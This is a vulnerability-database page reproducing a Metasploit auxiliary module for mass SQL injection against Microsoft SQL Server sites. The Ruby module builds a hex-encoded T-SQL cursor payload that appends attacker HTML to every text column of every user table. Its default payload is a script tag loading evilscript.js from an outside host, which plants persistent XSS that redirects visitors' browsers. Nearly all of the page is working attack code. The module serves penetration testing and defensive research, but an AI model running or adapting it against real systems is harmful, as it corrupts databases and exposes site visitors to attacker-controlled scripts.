Vulners
Lucene search
HTTP Microsoft SQL Injection Table XSS Infection
🗓️ 01 Sep 2024 00:00:00Reported by Jay Turla, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 167 Views
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::WmapModule
def initialize(info = {})
super(update_info(info,
'Name' => 'HTTP Microsoft SQL Injection Table XSS Infection',
'Description' => %q{
This module implements the mass SQL injection attack in
use lately by concatenation of HTML string that forces a persistent
XSS attack to redirect user browser to an attacker controller website.
},
'Author' => [ 'et' ],
'License' => BSD_LICENSE))
register_options(
[
OptString.new('URI', [ true, "The path/file to identify backups", '/index.asp']),
OptString.new('QUERY', [ true, "HTTP URI Query", 'p1=v1&p2=v2&p3=v3']),
OptString.new('VULN_PAR', [ true, "Vulnerable parameter name", 'p1']),
OptBool.new('TEXT_INT_INJECTION', [ true, "Perform string injection", false]),
OptBool.new('COMMENTED', [ true, "Comment end of query", true]),
OptString.new('EVIL_HTML', [ true, "Evil HTML to add to tables", '<script src=http://browser-autopwn.com/evilscript.js></script>']),
])
end
def run_host(ip)
# Weird to indent for practical reasons.
infstr = <<-EOF
DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''#{datastore['EVIL_HTML']}''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
EOF
infstr.gsub!(/(\t|\n|\r)/,"")
prestr = ";DECLARE @S NVARCHAR(4000);SET @S=CAST("
poststr = " AS NVARCHAR(4000));EXEC(@S);"
gvars = queryparse(datastore['QUERY']) #Now its a Hash
if gvars.has_key?(datastore['VULN_PAR'])
prestr = datastore['TEXT_INT_INJECTION'] ? "\'#{prestr}" : ''
poststr = datastore['COMMENTED'] ? "#{poststr}--" : ''
attstr = ""
infstr.unpack("C*").collect! { |i| attstr += i.to_s(base=16).upcase+"00" }
gvars[datastore['VULN_PAR']] += prestr + "0x"+attstr + poststr
else
print_error("Error: Vulnerable parameter is not part of the supplied query string.")
return
end
begin
normalres = send_request_cgi({
'uri' => normalize_uri(datastore['URI']),
'vars_get' => gvars,
'method' => 'GET',
'ctype' => 'text/plain'
}, 20)
rescue ::Rex::ConnectionError
rescue ::Errno::EPIPE
end
print_status("Request sent.")
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Sep 2024 00:00Current
7.4High risk
Vulners AI Score7.4